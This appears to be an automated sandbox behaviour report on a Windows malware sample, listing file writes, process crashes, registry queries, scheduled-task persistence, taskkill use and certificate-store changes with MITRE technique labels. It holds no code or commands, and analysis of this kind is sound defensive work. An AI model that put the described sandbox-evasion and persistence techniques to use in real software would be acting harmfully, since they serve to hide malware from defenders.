File opened for modification	C:\Windows\Installer\MSI232B.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	mask_svc.exe
File opened for modification	C:\Windows\Installer\MSI2465.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI293B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEDD1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE89F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE9C9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI26A9.tmp	msiexec.exe
File created	C:\Windows\Installer\f78c611.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f78c611.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File created	C:\Windows\INF\oem2.PNF	mask_svc.exe
File opened for modification	C:\Windows\Installer\MSI4367.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Installer\MSICCF7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE811.tmp	msiexec.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI24D3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 29 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4812	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
4728	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
4544	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
2032	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
4212	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
992	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
4736	4612	WerFault.exe	5vpgJBjyfbnbMk1YeKUgbWC8.exe
5000	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
3260	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
4080	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
2032	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
5176	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
5484	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
5756	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
5940	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
5208	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
6116	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
6136	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
1220	4512	WerFault.exe	customer3.exe
6064	508	WerFault.exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
7264	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe
7660	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe
7960	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe
8088	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe
6060	5884	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
5964	5884	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7144	5884	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7436	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe
5864	6248	WerFault.exe	QzzWzAr_j9Kq5r6IcoTisXGL.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

mask_svc.exetapinstall.execfsafjctapinstall.exesvchost.exeDrvInst.exe0UDlIYAqdx58fbBuKxF2FjgJ.execfsafjcH_GAN4lymZYNIe2SYb1o6PjL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters	mask_svc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	mask_svc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	0UDlIYAqdx58fbBuKxF2FjgJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	H_GAN4lymZYNIe2SYb1o6PjL.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	mask_svc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cfsafjc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters	mask_svc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	H_GAN4lymZYNIe2SYb1o6PjL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6944 schtasks.exe
7744 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6916 taskkill.exe

pid	process
6944	schtasks.exe
7744	schtasks.exe

pid	process
6916	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeRuntimeBroker.exebrowser_broker.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

mask_svc.exeoYJ4oarMVlCEKSuYDbZ6GPPw.exeDrvInst.exeUb5x4PDB1ffO3V76nVSdRb5L.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	Ub5x4PDB1ffO3V76nVSdRb5L.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	Ub5x4PDB1ffO3V76nVSdRb5L.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	Ub5x4PDB1ffO3V76nVSdRb5L.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	Ub5x4PDB1ffO3V76nVSdRb5L.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time"	mask_svc.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	mask_svc.exe
